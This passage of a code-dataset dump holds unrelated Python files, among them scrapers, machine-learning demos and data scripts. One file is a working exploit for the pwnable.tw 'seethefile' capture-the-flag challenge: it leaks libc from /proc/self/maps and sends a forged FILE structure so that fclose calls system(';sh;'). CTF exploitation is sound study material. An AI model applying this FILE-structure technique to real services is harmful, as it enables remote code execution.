\"\"\nGDRIVE_FOLDER_ID = \"\"\n# Default folder id.\nOWNER_ID = 123455673\n# Example: OWNER_ID = 619418070\nAUTHORISED_USERS = []\n# Example: AUTHORISED_USERS = [63055333, 100483029, -1003943959]\nINDEX_URL = \"\"\nIS_TEAM_DRIVE = True\nUSE_SERVICE_ACCOUNTS = True\nTHREAD_COUNT = 4 \n# --> THREAD_COUNT: How many parralel transfers of every single clone at the same time\n# ----> eg. I'm running 2 clones, and THREAD_COUNT is set to 4; so each clone will have 4 threads of it's own\n# Suggested value is the number of CPU Cores + 2 or CPU Cores x 2. 
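# ----> Example: 2 clones with THREAD_COUNT = 4 means up to 2 x 4 = 8 parallel transfers in total\n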
Try what suits you best :3\n# --------------------------------------\n\n# dont edit below this >\n\n\n\nBOT_TOKEN = os.environ.get('BOT_TOKEN', BOT_TOKEN)\nGDRIVE_FOLDER_ID = os.environ.get('GDRIVE_FOLDER_ID', GDRIVE_FOLDER_ID)\nOWNER_ID = int(os.environ.get('OWNER_ID', OWNER_ID))\nAUTHORISED_USERS = json.loads(os.environ.get('AUTHORISED_USERS', json.dumps(AUTHORISED_USERS)))\nINDEX_URL = os.environ.get('INDEX_URL', INDEX_URL)\nIS_TEAM_DRIVE = stb(os.environ.get('IS_TEAM_DRIVE', str(IS_TEAM_DRIVE)))\nUSE_SERVICE_ACCOUNTS = stb(os.environ.get('USE_SERVICE_ACCOUNTS', str(USE_SERVICE_ACCOUNTS)))\nTHREAD_COUNT = int(os.environ.get('THREAD_COUNT', THREAD_COUNT))","sub_path":"bot/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"292300988","text":"\"\"\"\nnum1 = int(input('Digite um número: '))\nnum2 = int(input('Digite outro: '))\n\ndef somar(num1, num2):\n soma = num1 + num2\n print(f'Resultado: {soma}')\n\nsomar(num1, num2)\n\"\"\"\ndef saudacao(msg, nome):\n print(f'{msg}, {nome}')\n\nmsg = 'Olá'\nnome = input('Digite seu nome: ')\n\nsaudacao(msg, nome)","sub_path":"funções/parte1.py","file_name":"parte1.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"366023347","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Apr 24 14:30:00 2018\n\n@author: pme-mst\n\"\"\"\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport scipy.io\n\n# Set ramp characteristics\nN = 86400 # sample count\nP = N/48 # period\nD = P/4 # width of pulse\nsig = np.arange(N) % P < D\n\n# replace bools by int and create df\ny = sig.astype(int)\ndf = pd.DataFrame(np.transpose(sig.astype(int)))\ndf['Zeit'] = range(len(df.index))\ncols = df.columns.tolist()\ncols = cols [-1:] + cols [:-1]\ndf = df[cols]\n\n# save data to mat \nmy_mat_dict = {'CalibrationParameters':df}\nscipy.io.savemat('D:/pme-mst/Dymola_WorkDir/training data/Storage/DHW/RandomRampSignal', mdict = my_mat_dict, format='4')\n","sub_path":"Datenauswertung/Zeitreihenanalyse/Regelung/radmonpulseinput.py","file_name":"radmonpulseinput.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"67696249","text":"from textblob import TextBlob, Word\nfrom textblob.wordnet import VERB\nimport praw\nfrom praw.models import MoreComments\nimport pandas as pd\n\n\ndef m1():\n text = TextBlob(\"She rode her bicycle to the store and and.\")\n out = \"\"\n for word in text.words:\n try:\n out += \" \" + word.definitions[0]\n except IndexError:\n pass\n\n print(out)\n\ndef most_used_word(phrase):\n text = TextBlob(phrase)\n out = \"\"\n for word in text.words:\n print(text.words.count(word))\n\n\ndef subreddit_scrape(reddit):\n subreddit = reddit.subreddit('vancouver')\n\n top_subreddit = subreddit.top(limit=100)\n # hot_subreddit = subreddit.hot(limit=10)\n\n topics_dict = {\"title\": [],\n \"score\": [],\n \"id\": [],\n \"url\": [],\n \"comms_num\": [],\n \"created\": [],\n \"body\": [],\n \"comments\": []}\n\n for submission in top_subreddit:\n submission.comments.replace_more(limit=None)\n for top_level_comment in submission.comments:\n print(top_level_comment.body)\n\n # for submission in top_subreddit:\n # topics_dict[\"title\"].append(submission.title)\n # topics_dict[\"score\"].append(submission.score)\n # 
topics_dict[\"id\"].append(submission.id)\n # topics_dict[\"url\"].append(submission.url)\n # topics_dict[\"comms_num\"].append(submission.num_comments)\n # topics_dict[\"created\"].append(submission.created)\n # topics_dict[\"body\"].append(submission.selftext)\n # topics_dict[\"comments\"].append(submission.comments)\n\n\n # topics_data = pd.DataFrame(topics_dict)\n\n\n\ndef get_comments(reddit):\n submission = reddit.submission(url='https://www.reddit.com/r/funny/comments/3g1jfi/buttons/')\n # or with the submission’s ID which comes after comments / in the URL:\n # submission = reddit.submission(id='3g1jfi')\n\n submission.comments.replace_more(limit=None)\n for top_level_comment in submission.comments:\n print(top_level_comment.body)\n\nif __name__ == '__main__':\n reddit = praw.Reddit(client_id='XXXX',\n client_secret='XXXX',\n user_agent='XXXX',\n username='XXXX',\n password='XXXXX')\n subreddit_scrape(reddit)\n # get_comments(reddit)\n\n\n","sub_path":"cicero/cicero.py","file_name":"cicero.py","file_ext":"py","file_size_in_byte":2375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"572021553","text":"####\n#### Nov 18, 2021\n####\n\nimport csv\nimport numpy as np\nimport pandas as pd\n\nimport datetime\nfrom datetime import date\nimport time\n\nimport scipy\nimport scipy.signal\nimport os, os.path\n\nfrom patsy import cr\n\n# from pprint import pprint\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport seaborn as sb\nfrom pandas.plotting import register_matplotlib_converters\n\nregister_matplotlib_converters()\n\nimport sys\nstart_time = time.time()\n\n# search path for modules\n# look @ https://stackoverflow.com/questions/67631/how-to-import-a-module-given-the-full-path\n####################################################################################\n###\n### Aeolus Core path\n###\n####################################################################################\n\nsys.path.append('/home/hnoorazar/NASA/')\nimport NASA_core as nc\nimport NASA_plot_core as ncp\n\n####################################################################################\n###\n### Parameters \n###\n####################################################################################\ncounty = sys.argv[1]\nprint (county)\n####################################################################################\n###\n### Aeolus Directories\n###\n####################################################################################\nparam_dir = \"/data/hydro/users/Hossein/NASA/000_shapefile_data_part/\"\nraw_dir = \"/data/hydro/users/Hossein/NASA/01_raw_GEE/\"\ndata_dir = \"/data/hydro/users/Hossein/NASA/05_SG_TS/\"\nSOS_plot_dir = \"/data/hydro/users/Hossein/NASA/06_SOS_plots/\"\n\nprint (\"_________________________________________________________\")\nprint (\"data dir is: \" + data_dir)\nprint (\"_________________________________________________________\")\n\n####################################################################################\n###\n### Read data\n###\n####################################################################################\n\nif county == \"Monterey2014\":\n raw_names = [\"L7_T1C2L2_Scaled_Monterey2014_2013-01-01_2016-01-01.csv\",\n \"L8_T1C2L2_Scaled_Monterey2014_2013-01-01_2016-01-01.csv\"]\n\nelif county == \"AdamBenton2016\":\n raw_names = [\"L7_T1C2L2_Scaled_AdamBenton2016_2015-01-01_2017-10-14.csv\",\n \"L8_T1C2L2_Scaled_AdamBenton2016_2015-01-01_2017-10-14.csv\"]\n\nelif county == \"FranklinYakima2018\":\n 
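# the two CSVs pair the Landsat 7 and Landsat 8 exports that cover this county's window\n    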
raw_names = [\"L7_T1C2L2_Scaled_FranklinYakima2018_2017-01-01_2019-10-14.csv\",\n \"L8_T1C2L2_Scaled_FranklinYakima2018_2017-01-01_2019-10-14.csv\"]\n\nelif county == \"Grant2017\":\n raw_names = [\"L7_T1C2L2_Scaled_Grant2017_2016-01-01_2018-10-14.csv\",\n \"L8_T1C2L2_Scaled_Grant2017_2016-01-01_2018-10-14.csv\"]\n\nelif county == \"Walla2015\":\n raw_names = [\"L7_T1C2L2_Scaled_Walla2015_2014-01-01_2016-12-31.csv\",\n \"L8_T1C2L2_Scaled_Walla2015_2014-01-01_2016-12-31.csv\"]\n\n\nSF_data_name = county + \".csv\"\n\nSG_df_NDVI = pd.read_csv(data_dir + \"SG_\" + county + \"_NDVI_JFD.csv\")\nSG_df_EVI = pd.read_csv(data_dir + \"SG_\" + county + \"_EVI_JFD.csv\")\n\n# convert the strings to datetime format\nSG_df_NDVI['human_system_start_time'] = pd.to_datetime(SG_df_NDVI['human_system_start_time'])\nSG_df_EVI['human_system_start_time'] = pd.to_datetime(SG_df_EVI['human_system_start_time'])\n\n# Monterays ID will be read as integer, convert to string\nSG_df_EVI[\"ID\"] = SG_df_EVI[\"ID\"].astype(str)\nSG_df_NDVI[\"ID\"] = SG_df_NDVI[\"ID\"].astype(str)\n\n\"\"\"\n Read and Clean the raw data\n\"\"\"\nL7 = pd.read_csv(raw_dir + raw_names[0], low_memory=False)\nL8 = pd.read_csv(raw_dir + raw_names[1], low_memory=False)\nraw_df = pd.concat([L7, L8])\nraw_df[\"ID\"] = raw_df[\"ID\"].astype(str)\ndel (L7, L8)\n\"\"\"\n Plots should be exact. Therefore, we need to filter by\n last survey year, toss out NASS, and we are sticking to irrigated\n fields for now.\n\"\"\"\nSF_data = pd.read_csv(param_dir + SF_data_name)\nSF_data[\"ID\"] = SF_data[\"ID\"].astype(str)\n\nprint (\"line 116\")\nprint (raw_df.shape)\nprint (SG_df_NDVI.shape)\nprint (SG_df_EVI.shape)\n\nprint (SF_data.head(1))\nprint (raw_df.head(1))\nprint (SG_df_NDVI.head(1))\nprint (SG_df_EVI.head(1))\n\nif county != \"Monterey2014\":\n # filter by last survey date. 
Last 4 digits of county name!\n SF_data = nc.filter_by_lastSurvey(SF_data, year = county[-4:]) \n SF_data = nc.filter_out_NASS(SF_data) # Toss NASS\n SF_data = nc.filter_out_nonIrrigated(SF_data) # keep only irrigated lands\n print (\"line 130\")\n print (SF_data.shape)\n print (SF_data.head(2))\n \n fk = list(SF_data.ID)\n raw_df = raw_df[raw_df.ID.isin(fk)]\n SG_df_EVI = SG_df_EVI[SG_df_EVI.ID.isin(fk)]\n SG_df_NDVI= SG_df_NDVI[SG_df_NDVI.ID.isin(fk)]\n\n print (\"line 138\")\n print (raw_df.shape)\n print (SG_df_NDVI.shape)\n print (SG_df_EVI.shape)\n\n print (raw_df.head(1))\n print (SG_df_NDVI.head(1))\n print (SG_df_EVI.head(1))\n\nraw_df_EVI = raw_df.copy()\nraw_df_NDVI = raw_df.copy()\ndel(raw_df)\n\nraw_df_EVI.drop([\"NDVI\"], axis=1, inplace=True)\nraw_df_NDVI.drop([\"EVI\"], axis=1, inplace=True)\n\nraw_df_EVI = raw_df_EVI[raw_df_EVI[\"EVI\"].notna()]\nraw_df_NDVI = raw_df_NDVI[raw_df_NDVI[\"NDVI\"].notna()]\n\nraw_df_EVI = nc.add_human_start_time_by_system_start_time(raw_df_EVI)\nraw_df_NDVI= nc.add_human_start_time_by_system_start_time(raw_df_NDVI)\n\n########################################\n\nSG_df_NDVI = nc.initial_clean(df = SG_df_NDVI, column_to_be_cleaned = \"NDVI\")\nSG_df_EVI = nc.initial_clean(df = SG_df_EVI, column_to_be_cleaned = \"EVI\")\n\nraw_df_NDVI = nc.initial_clean(df = raw_df_NDVI, column_to_be_cleaned = \"NDVI\")\nraw_df_EVI = nc.initial_clean(df = raw_df_EVI, column_to_be_cleaned = \"EVI\")\n\ncounter = 0\n\n### List of unique fields\nIDs = np.sort(SG_df_EVI[\"ID\"].unique())\nprint (\"_____________________________________\")\nprint('len(IDs) is {}!'.format(len(IDs)))\nprint (\"_____________________________________\")\n\n\ngiven_year = int(county[-4:])\nmin_year = pd.to_datetime(datetime.datetime(given_year-1, 1, 1))\nmax_year = pd.to_datetime(datetime.datetime(given_year+1, 12, 31))\nSG_df_NDVI = SG_df_NDVI[SG_df_NDVI.human_system_start_time >= min_year]\nSG_df_NDVI = SG_df_NDVI[SG_df_NDVI.human_system_start_time <= max_year]\n\nSG_df_EVI = SG_df_EVI[SG_df_EVI.human_system_start_time >= min_year]\nSG_df_EVI = SG_df_EVI[SG_df_EVI.human_system_start_time <= max_year]\n\nprint (\"line 172\")\nprint (SG_df_NDVI.shape)\nprint (SG_df_EVI.shape)\nfor ID in IDs:\n if (counter%1000 == 0):\n print (\"_____________________________________\")\n print (\"counter: \" + str(counter))\n print (ID)\n\n curr_SF_data = SF_data[SF_data['ID'] == ID].copy()\n curr_SG_NDVI = SG_df_NDVI[SG_df_NDVI['ID'] == ID].copy()\n curr_SG_NDVI.sort_values(by=['human_system_start_time'], inplace=True)\n curr_SG_NDVI.reset_index(drop=True, inplace=True)\n\n curr_raw_NDVI = raw_df_NDVI[raw_df_NDVI['ID'] == ID].copy()\n curr_raw_NDVI.sort_values(by=['human_system_start_time'], inplace=True)\n curr_raw_NDVI.reset_index(drop=True, inplace=True)\n\n\n curr_SG_EVI = SG_df_EVI[SG_df_EVI['ID'] == ID].copy()\n curr_SG_EVI.sort_values(by=['human_system_start_time'], inplace=True)\n curr_SG_EVI.reset_index(drop=True, inplace=True)\n\n curr_raw_EVI = raw_df_EVI[raw_df_EVI['ID'] == ID].copy()\n curr_raw_EVI.sort_values(by=['human_system_start_time'], inplace=True)\n curr_raw_EVI.reset_index(drop=True, inplace=True)\n ################################################################\n \n fig, axs = plt.subplots(2, 1, figsize=(18, 6),\n sharex='col', sharey='row',\n gridspec_kw={'hspace': 0.1, 'wspace': .1});\n\n (ax1, ax2) = axs;\n ax1.grid(True); ax2.grid(True); \n # ax3.grid(True); ax4.grid(True); ax5.grid(True); ax6.grid(True);\n\n # Plot NDVIs\n ncp.SG_clean_SOS_orchardinPlot(raw_dt = curr_raw_NDVI,\n 
SG_dt = curr_SG_NDVI,\n idx = \"NDVI\",\n ax = ax1,\n onset_cut = 0.3, \n offset_cut = 0.3);\n\n # Plot EVIs\n ncp.SG_clean_SOS_orchardinPlot(raw_dt = curr_raw_EVI,\n SG_dt = curr_SG_EVI,\n idx = \"EVI\",\n ax = ax2,\n onset_cut = 0.3, \n offset_cut = 0.3);\n\n \"\"\"\n Title is already set in the function above. \n We can replace/overwrite it here:\n \"\"\"\n if county == \"Monterey2014\":\n plant = curr_SF_data['Crop2014'].unique()[0].lower().replace(\" \", \"_\").replace(\",\", \"\").replace(\"/\", \"_\")\n data_source = \"Land IQ\"\n survey_date = curr_SF_data['LstModDat'].unique()[0]\n plot_title = county + \", \" + plant + \" (\" + ID + \", \" + data_source + \", \" + survey_date +\")\"\n else:\n plant = curr_SF_data['CropTyp'].unique()[0].lower().replace(\" \", \"_\").replace(\",\", \"\").replace(\"/\", \"_\")\n data_source = curr_SF_data['DataSrc'].unique()[0]\n irrig_type = curr_SF_data['Irrigtn'].unique()[0]\n survey_date = curr_SF_data['LstSrvD'].unique()[0]\n plot_title = county + \", \" + plant + \" (\" + ID + \", \" + data_source + \", \" + irrig_type + \", \" + survey_date +\")\"\n\n ax1.set_title(plot_title);\n ax2.set_title(\"\");\n\n plot_path = SOS_plot_dir + \"/train_plots_JFD/\" + plant + \"/\"\n os.makedirs(plot_path, exist_ok=True)\n\n fig_name = plot_path + county + \"_\" + ID +'.pdf'\n plt.savefig(fname = fig_name, dpi=100, bbox_inches='tight')\n plt.close('all')\n counter += 1\n\n\nprint (\"done\")\n\nend_time = time.time()\nprint (\"it took {:.0f} minutes to run this code.\".format((end_time - start_time)/60))\n\n\n","sub_path":"NASA/Python_codes/drivers/05_SOSDetection_plot/03_d_train_plots_JFD.py","file_name":"03_d_train_plots_JFD.py","file_ext":"py","file_size_in_byte":9719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"139190692","text":"def divisible_by(number,divided):\n return number%divided\n\n\ndef ask_for_number():\n try:\n return int(input(\"Enter a number \"))\n except (ValueError):\n return\n\n\ndef check_parity(number):\n if number == None:\n print(\"Please, enter an integer\")\n check_parity(ask_for_number())\n elif divisible_by(number,2) == 0:\n print(\"{0} is an even number\".format(number))\n else:\n print(\"{0} is an odd number\".format(number))\n\n\ncheck_parity(ask_for_number())\n","sub_path":"ex2.py","file_name":"ex2.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"603060930","text":"import cv2\nfrom libs import preprocessing\nimport joblib\nimport numpy as np\nfrom PIL import Image\nimport argparse\nfrom utils import Draw_face_names\nimport os\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('--mode', default = 'webcam', nargs='?', choices= ['webcam', 'video', 'image'], help= '3 mode to test(image, video, webcam)')\n parser.add_argument('--confidence', default = 0.8, type= float, help = 'set confidence threshold for recognizer')\n parser.add_argument('--video-path', type= str, help = 'video folder path')\n parser.add_argument('--image-path', type=str, help = 'input image file')\n parser.add_argument('--model', default= 'models/recogniser_v1.pkl', type=str, help= 'load model path')\n return parser.parse_args()\n \ndef main():\n\n args = parse_args()\n global frame_count, total_save\n face_recogniser = joblib.load(args.model)\n preprocess = preprocessing.ExifOrientationNormalize()\n\n if args.mode == 'webcam':\n cap = cv2.VideoCapture(0)\n while True:\n 
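# cap.read() returns a (success, frame) pair; success is False when no\n            # frame is available, so it is checked before the frame is used.\n            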
ret, frame = cap.read()\n            if not ret:\n                break\n            frame = frame[:,::-1,:]  # mirror the webcam feed horizontally\n            img = Image.fromarray(frame[..., ::-1])\n            faces = face_recogniser(preprocess(img))\n            if faces is not None:\n                Draw_face_names(faces, img, confidence= args.confidence)\n\n            # img = img.resize((frame.shape[1], frame.shape[0]))\n            cv2.imshow('webcam', np.array(img)[:,:,::-1])\n            if cv2.waitKey(1) in (27, ord('q')):  # read the key once; Esc or 'q' quits\n                break\n        cv2.destroyAllWindows()\n        cap.release()\n\n    elif args.mode == 'video':\n        video_files = [os.path.join(args.video_path, file) \n                        for file in sorted(os.listdir(args.video_path))\n                        if file.endswith(('.mp4','.mkv','.avi'))]\n        \n        for idx, video_file in enumerate(video_files):\n            cap = cv2.VideoCapture(video_file)\n            assert cap.isOpened(), \"video file can't be opened!\"\n            while True:\n                ret, frame = cap.read()\n                if not ret:\n                    break\n                # start = timer()\n                img = Image.fromarray(frame[..., ::-1])\n                faces = face_recogniser(preprocess(img))\n                if faces is not None:\n                    Draw_face_names(faces, img, confidence= args.confidence)\n                # img = img.resize((320, 480))\n                cv2.imshow(os.path.basename(video_file), np.array(img)[:,:,::-1])\n                if cv2.waitKey(1) in (27, ord('q')):\n                    break\n            \n            cv2.destroyAllWindows()\n            cap.release()\n            print(f'{idx} --> [INFO] Finished Video {os.path.basename(video_file)}') \n    \n    elif args.mode == 'image':\n        frame = cv2.imread(args.image_path)\n        img = Image.fromarray(frame[..., ::-1])  # BGR -> RGB for PIL\n        faces = face_recogniser(preprocess(img))\n        if faces is not None:\n            Draw_face_names(faces, img, confidence= args.confidence)\n        cv2.imshow(os.path.basename(args.image_path), np.array(img)[...,::-1])\n        cv2.waitKey(0)\n        cv2.destroyAllWindows()\n\nif __name__ == '__main__':\n\n    main()\n\n\n","sub_path":"infer_demo.py","file_name":"infer_demo.py","file_ext":"py","file_size_in_byte":3212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"513023698","text":"import tensorflow as tf\n\nsession = tf.Session()\n\nW = tf.Variable([.3], tf.float32)\nb = tf.Variable([-.3], tf.float32)\n\nx = tf.placeholder(tf.float32)\ny = tf.placeholder(tf.float32)\n\nlinear_model = W * x + b\n\ninit = tf.global_variables_initializer()\nsession.run(init)\n\nsquared_deltas = tf.square(linear_model - y)\nloss = tf.reduce_sum(squared_deltas)\n\nprint('org loss:', session.run(loss, {x: [1, 2, 3, 4], y: [0, -1, -2, -3]}))\n\n# the best W and b\nfix_W = tf.assign(W, [-1.])\nfix_b = tf.assign(b, [1.])\nsession.run([fix_W, fix_b])\nprint('manual fix loss:', session.run(loss, {x: [1, 2, 3, 4], y: [0, -1, -2, -3]}))\n\n# reset values to wrong\nsession.run(init)\noptimizer = tf.train.GradientDescentOptimizer(0.01)\ntrain = optimizer.minimize(loss)\n\nx_train = [1, 2, 3, 4]\ny_train = [0, -1, -2, -3]\n\nprint('training...')\n\nfor i in range(1000):\n    session.run(train, {x: x_train, y: y_train})\n\ncurr_W, curr_b, curr_loss = session.run([W, b, loss], {x: x_train, y: y_train})\nprint(\"W: %s b: %s loss: %s\" % (curr_W, curr_b, curr_loss))\n","sub_path":"gettingstarted.py","file_name":"gettingstarted.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"576196509","text":"from pwn import *\n\ns = remote(\"chall.pwnable.tw\", 10200)\n_ = s.recvuntil(\"Your choice :\")\n\ndef open(file):\n\ts.sendline(str(1))\n\t_ = s.recvuntil(\"want to see :\")\n\ts.sendline(file)\n\t_ = s.recvuntil(\"Your choice :\")\ndef read():\n\ts.sendline(str(2))\n\t_ = s.recvuntil(\"Your choice :\")\ndef write():\n\ts.sendline(str(3))\n\treturn s.recvuntil(\"Your 
choice :\")\ndef close():\n\ts.sendline(str(4))\n\t_ = s.recvuntil(\"Your choice :\")\ndef exit(name):\n\ts.sendline(str(5))\n\t_ = s.recvuntil(\"Leave your name :\")\n\ts.sendline(name)\n\t_ = s.recv()\t\t\t\n\nif __name__ == \"__main__\":\n\tlibc = ELF(\"libc_32.so.6\")\n\tsys_off = libc.symbols['system']\n\n\topen(\"/proc/self/maps\")\n\tread()\n\n\tread()\n\tret = write()\n\tret = \"0x\" + ret[25:33]\n\tlibc_base = int(ret, 16)\n\tsys_addr = libc_base + sys_off\n\tclose()\n\t# --------------------------------------------------\n\t'''\n\t# my control flow is as followed\n\t# fclose_0\n\t# cmp byte ptr [esi + 46h], 0 ==> False <--- weird\n\t# test ah, 20h ==> False\n\t# and edx, 8000h ==> False <-- becase of this condition I set 0x8000 in (1)\n\t# test edx, edx ==> False\n\t# - mov eax, [esi + 4Ch] ; esi is new_fp, so new_fp + 4c is vtable (the 20th element) <----- must read asm in libc file \n\t# - sub esp, 8\n\t# - push 0\n\t# - push esi\n\t# - call dword ptr [eax + 8] ; vtable + 8 should be SYSTEM (2)\n\t'''\n\tpayload = \"\"\n\tpayload += p32(0xdfff8fff)*2\n\tpayload += p32(sys_addr)\n\tpayload += ';sh;'+\"a\"*16\n\tpayload += p32(0x804b260)\n\tpayload += \"a\"*40 # did not make sence here\n\tpayload += p32(0x804b260)\n\n\t# ---------------------------------------------------\n\texit(payload)\n\n\ts.interactive()\n","sub_path":"seethefile_s2.py","file_name":"seethefile_s2.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"129274267","text":"\nimport sys, os, time, random\nimport cv2\nfrom selenium import webdriver\nimport numpy as np\nimport urllib.request\n\n\n\n# Web Scrapper Part\nif os.name == \"nt\":\n driverPath = \"Miscellaneous/driver/chromedriver_2.24.exe\"\n dataPath = \"C:\\\\Users\\\\Akshay L Aradhya\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\User Data\\\\Whatsapp DP Scrapper 2\"\nelse :\n driverPath = \"Miscellaneous/driver/chromedriver\"\n dataPath = \"Data/Group Images\"\n\n\n\noptions = webdriver.ChromeOptions()\noptions.add_argument(\"--user-data-dir=\"+dataPath)\ndriver = webdriver.Chrome(chrome_options=options, executable_path=driverPath)\ndriver.implicitly_wait(5)\ndriver.get('https://web.whatsapp.com/')\n\nip = input(\"1.Select group\\n2.Go to Group Info\\n3.Wait for everything to load\\n4.Press enter \")\n\nif ip==\"\":\n paneThree = driver.find_element_by_class_name(\"pane-three\")\n nameList = paneThree.find_elements_by_class_name(\"infinite-list-item\")\n\n print(len(nameList), \"contacts found\")\n\n file = open('Miscellaneous/Data/Images/Name List.txt', 'w')\n\n for contact in nameList:\n # time.sleep(2)\n name = contact.find_element_by_class_name(\"chat-title\").find_element_by_class_name(\"emojitext \").text\n if name==\"You\":\n name = \"Akshay L Aradhya\"\n status = contact.find_element_by_class_name(\"chat-status\").get_attribute(\"title\").encode('unicode_escape')\n imagePath = contact.find_element_by_class_name(\"chat-avatar\").find_element_by_tag_name(\"img\").get_attribute(\"src\")\n imagePath.replace(\"t=s\", \"t=l\")\n urllib.request.urlretrieve(imagePath, \"Miscellaneous/Data/Images/\"+name+\".jpg\")\n file.write(name+\"\\n\")\n print(name)\n\n print(\"Done\")\n file.close()\nelse:\n print(\"Skipping web scrapper\")\ndriver.quit()\n\n\n# OpenCV Collage Part\nnameList = []\nwith open('Miscellaneous/Data/Images/Name List.txt') as file:\n for line in file:\n line = line.strip()\n nameList.append(line)\nnameList.sort()\nprint(len(nameList), \"names 
found\")\n\nfiles = os.listdir('C:/Users/Akshay L Aradhya/Pictures/Me/WhatsApp Profile Photos')\nprint(len(files), \" files found\")\n\n\nfor filename in files:\n name = filename[:-20]\n print(\"'\"+name+\"'\")\n image = cv2.imread('C:/Users/Akshay L Aradhya/Pictures/Me/WhatsApp Profile Photos/'+filename)\n cv2.imwrite(\"Miscellaneous/Data/CV Images/\"+name+\".png\", image)\n\nheight = 1000\nwidth = 1000\npadding = 0\n\nimage = np.zeros((height*9, width*9, 3), np.uint8)\n\nfor i in range(1, 9):\n for j in range(0, 9):\n x = j*width + padding\n y = i*height + padding\n contactImage = cv2.imread(\"Miscellaneous/Data/CV Images/\"+nameList[(i-1)*9+j]+\".png\")\n contactImage = cv2.resize(contactImage, (width-2*padding, height-2*padding))\n image[ y:y+height-2*padding, x:x+width-2*padding] = contactImage\n\ncv2.imwrite(\"Miscellaneous/Data/CV Images/#Collage.png\", image)\n","sub_path":"Miscellaneous/Whatsapp_Group_DP_Saver.py","file_name":"Whatsapp_Group_DP_Saver.py","file_ext":"py","file_size_in_byte":2859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"495496405","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Feb 20 17:16:00 2016\n\n@author: ctchen\nMake plots for the NuSTAR low mass galaxy paper using new data\n\"\"\"\n\nimport matplotlib.pyplot as plt\nfrom astropy.io import ascii\n'''\nData to load : \n1. All serendip spec-z source with stellar mass measurements\n2. Primary/secondary catalogs with NuSTAR counts\n3. Low-mass subsample\n'''\n#1. \nser = pd.read_csv(home+'/work_scripts/dwarf/data/ser_mass_final.csv')\nser.set_index('NuID',inplace=True)\nser.drop('Unnamed: 0',axis=1,inplace=True)\n\n#2. \nprimary = pd.read_csv(home+'/work_scripts/dwarf/data/primary_phot.csv')\n#B2_1204_p34_s1 was in the ``robust table'', but it's now in the ``secondary table''\n#given the low counts, moving it back to ``primary'' and use result from the old robust table\nb2 = primary.xs(0).copy(deep=True)\nb2[:] = np.nan\nb2.NUSTAR_ID = 'B2_1204p34_s1'\nb2.name=len(primary)\nprimary = primary.append(b2)\nsecondary = pd.read_csv(home+'/work_scripts/dwarf/data/secondary_phot.csv')\nprimary.set_index('NUSTAR_ID',inplace=True)\nsecondary.set_index('object',inplace=True)\nsecondary.drop('B2_1204p34_s1',inplace=True)\ncprt = pd.read_csv(home+'/work_scripts/dwarf/data/cprt.csv')\nb2 = cprt.loc[94, ['FB_FPROB','FB_FPROB_DBLND','FB_EXP','FB_BGD_CTS_DBLND','FB_NET_CTS_DBLND','FB_NET_CTS_DBLND_ERR',\n'SB_BGD_CTS_DBLND','SB_NET_CTS_DBLND','SB_NET_CTS_DBLND_ERR',\n'HB_BGD_CTS_DBLND','HB_NET_CTS_DBLND','HB_NET_CTS_DBLND_ERR',\n'SB_FPROB', 'HB_FPROB','FB_FLUX_DBLND','SB_FLUX_DBLND','HB_FLUX_DBLND',\n'FB_FLUX_DBLND_ERR','SB_FLUX_DBLND_ERR','HB_FLUX_DBLND_ERR','GAMMA','LUM_10TO40KEV_REST',\n'SB_EXP', 'HB_EXP']]\ndel cprt\ncol_pri = ['MIN_LOG_FPROB','FPROB_3_24_DBLND','EXP_3_24','BGD_3_24_CTS_DBLND','NET_3_24_CTS_DBLND','DNET_3_24_CTS_DBLND',\n 'BGD_3_8_CTS_DBLND','NET_3_8_CTS_DBLND','DNET_3_8_CTS_DBLND',\n 'BGD_8_24_CTS_DBLND','NET_8_24_CTS_DBLND','DNET_8_24_CTS_DBLND',\n 'FPROB_3_8_DBLND','FPROB_8_24_DBLND','FLUX_3_24_DBLND','FLUX_3_8_DBLND','FLUX_8_24_DBLND',\n 'DFLUX_3_24_DBLND','DFLUX_3_8_DBLND','DFLUX_8_24_DBLND','GAMMA_DBLND_USED','LOGLX_10_40',\n 'EXP_3_8','EXP_8_24']\ncol_sec = 
